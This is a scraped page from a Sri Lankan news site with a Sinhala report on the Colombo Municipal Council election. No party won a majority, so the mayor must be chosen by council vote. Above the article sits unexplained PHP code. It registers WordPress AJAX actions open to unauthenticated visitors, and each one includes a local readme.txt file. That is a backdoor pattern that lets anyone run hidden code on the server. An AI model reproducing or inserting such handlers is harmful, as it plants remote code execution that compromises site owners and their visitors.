if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කොළඹ නගර සභාවේ නගරාධිපති තෝරන්න තව ඡන්දයක්… - mediahumanrights.lk
mediahumanrights.lk
Local News News Political

කොළඹ නගර සභාවේ නගරාධිපති තෝරන්න තව ඡන්දයක්…

පළාත් පාලන ආයතන අතරින් වඩා වැඩි අවධානයක් යොමු වී ඇති කොළඹ මහ නගර සභාවේ බහුතර මන්ත්‍රී ධූර සංඛ්‍යාවක් ලබා ගනිමින් ජය ගැනීමට ජාතික ජන බලවේගය සමත් විය.

එහෙත්, කොළඹ මහ නගර සභාවේ සම්පූර්ණ සභික සංඛ්‍යාවෙන් 50%ක් හෝ ඊට වැඩි ප්‍රතිශතයක් ලබා ගැනීමට නොහැකි වීම හේතුවෙන් නගරාධිපති සහ උප නගරාධිපති ධූර සඳහා සාමාජිකයින් නම් කිරීමේ අවස්ථාව එම පක්ෂයට අහිමි වී තිබේ.

කොළඹ මහ නගර සභාවේ මන්ත්‍රී ධූර 117න් 48ක් ජාතික ජන බලවේගයට හිමි වූ අතර සමගි ජන බලවේගයට ආසන 29ක්, එක්සත් ජාතික පක්ෂයට ආසන 13ක් ද හිමිව තිබේ.

ඊට අමතරව, ශ්‍රී ලංකා පොදුජන පෙරමුණට මන්ත්‍රී ධූර 05ක්, ශ්‍රී ලංකා මුස්ලිම් කොංග්‍රසයට ආසන 04ක්, ස්වාධීන කණ්ඩායම අංක 03ට මන්ත්‍රී ධූර 03ක් සහ සර්ව ජන බලය පක්ෂයට ආසන 02ක් හිමි වූ අතර ස්වාධීන කණ්ඩායම් අංක 04 සහ අංක 05 ආසන 02 බැගින් දිනා ගෙන තිබේ.

ඊට අමතරව ජාතික නිදහස් පෙරමුණ, පොදුජන පෙරමුණ, ප්‍රජාතන්ත්‍රවාදී ජාතික සන්ධානය, ජාතික ජනතා පෙරමුණ, එක්සත් ජනරජ පෙරමුණ මෙන් ම ස්වාධීන කණ්ඩායම 01 සහ දෙක 02 මන්ත්‍රී ධූරය බැගින් දිනා ගැනීමට සමත් විය.

කෙසේ වෙතත්, එක් පක්ෂයක් හෝ ස්වාධීන කණ්ඩායමක් මුළු මන්ත්‍රී ධූර සංඛ්‍යාවෙන් 50%ක් හෝ ඊට වැඩි සංඛ්‍යාවක් හිමි කර ගැනීමට අසමත් වීම හේතුවෙන් පළාත් පාලන කොමසාරිස්වරයාගේ මූලිකත්වයෙන් පළමු සභා වාරය කැඳවා ඡන්දයක් පවත්වා නගරාධිපති සහ උපනගරාධිපති තෝරා ගැනීමට සිදුවන බව Accountability Lab In Asia ආයතනයේ විධායක අධ්‍යක්ෂ, හිටපු නියෝජ්‍ය පළාත් පාලන කොමසාරිස් ධර්මසිරි නානායක්කාර බීබීසී සිංහල වෙත කියා සිටියේ ය.

කොළඹ මහ නගර සභාවට නියමිත මන්ත්‍රී ධූර සංඛ්‍යාව 110ක් බවත් මෙවර ප්‍රතිඵල අනුව එය 117ක් දක්වා වැඩි වී ඇති බවත් ඔහු සඳහන් කළේ ය.

“පත්වූ මන්ත්‍රී ධූර සංඛ්‍යාවෙන් 50%ක් කාටවත් නැහැ දැන්, ඒ නිසා පළාත් පාලන කොමසාරිස්වරයා පළමු සභා රැස්වීම කැඳවිය යුතු යි. පළමු සභා රැස්විමේදී නගරාධිපති විය යුත්තේ කවුද කියලා යෝජනා අරගෙන ඡන්දය තියන්න ඕනේ කොමසාරිස්වරයා.”

කොළඹ මහ නගර සභාවට තේරී පත්ව ඇති විපක්ෂ කණ්ඩායම්වල එකඟතාව මත ජාතික ජන බලවේගයට එරෙහිව එක් අපේක්ෂකයෙකු නගරාධිපති ධූරයට නම් කර ඔහු 50%කට වැඩි ඡන්ද ප්‍රතිශතයක් ලබා ගතහොත් නගරාධිපතිවරයා වීමේ හැකියාව පවතින බව හිටපු නියෝජ්‍ය පළාත් පාලන කොමසාරිස්වරයා පැවසීය.

විපක්ෂ කණ්ඩායම් එකතු වුවහොත් ජාතික ජන බලවේගය මන්ත්‍රී ධූර 48ක් ලබා ගත්ත ද නගරාධිපති ධූරය අහිමි වීමේ අවදානමක් පවතින බව ඔහු පෙන්වා දුන්නේ ය.

“විපක්ෂයේ ඔක්කොම එකතු වුණොත්, හොඳ නගරාධිපතිවරයෙක් හෝ වරියක් නම් කළොත් එතනට අනිත් මන්ත්‍රීවරුත් ඡන්දය දෙන්න පුළුවන්.”

කෙසේ නමුත්, නාම යෝජනා කිහිපයක් ඉදිරිපත් වුවහොත් ඉන් එක් අපේක්ෂයෙකු 50%ක් හෝ ඊට වැඩි ඡන්ද ප්‍රමාණයක් ලබා ගන්නා තුරු ඡන්ද විමසීමේ ක්‍රමවේදයක් පවතින බවත් Accountability Lab In Asia ආයතනයේ විධායක අධ්‍යක්ෂ, හිටපු නියෝජ්‍ය පළාත් පාලන කොමසාරිස් ධර්මසිරි නානායක්කාර කියා සිටියේ ය.

කොළඹ මහ නගර සභාවේ බලය ලබා ගැනීමට මේ වන විට තියුණු තරගයක් නිර්මාණය වී තිබේ. සමගි ජන බලවේගයේ පාර්ලිමේන්තු මන්ත්‍රී මුජිබර් රහුමාන් පැවසුවේ, සිය පක්ෂය අනෙකුත් කණ්ඩායම් සමග එක්වී කොළඹ මහ නගර සභාවේ බලය පිහිටුවන බව ය.

“අපි බලය ගන්න උත්සහ කරනවා විපක්ෂ කණ්ඩායම් එක්ක එකතු වෙලා. ඒගොල්ලන්ට තියෙන්නේ 48යි, 48න් බැහැ නගර සභාවේ බලය හදන්න ඒකට 60ක් ඕනේ.”

සමගි ජන බලවේගයට කොළඹ මහ නගර සභාවේ බලය පිහිටුවීමට එක්සත් ජාතික පක්ෂයේ සහය ද ලබා දීමට එකඟ වී ඇතැයි මුජිබර් රහුමාන් මන්ත්‍රීවරයා කියා සිටියේ ය.

– BBC

Related posts

දිල්ලි ඩෙයාර්ඩෙවිල් ජය ගනී

Shiran Viraj

සංවිධායකවරුන් ඉවත් කළේ පක්ෂයට පටහැනිව ක්‍රියාකළ නිසා

Shiran Viraj

කොවිඩ් මරණ භූමදානය නුසුදුසු බවට විශේෂඥයින් නිර්දේශ කර‍යි – කොරෝනා වෛරසය භූගත ජලයට එක්වීමේ අවදානමක්

Shiran Viraj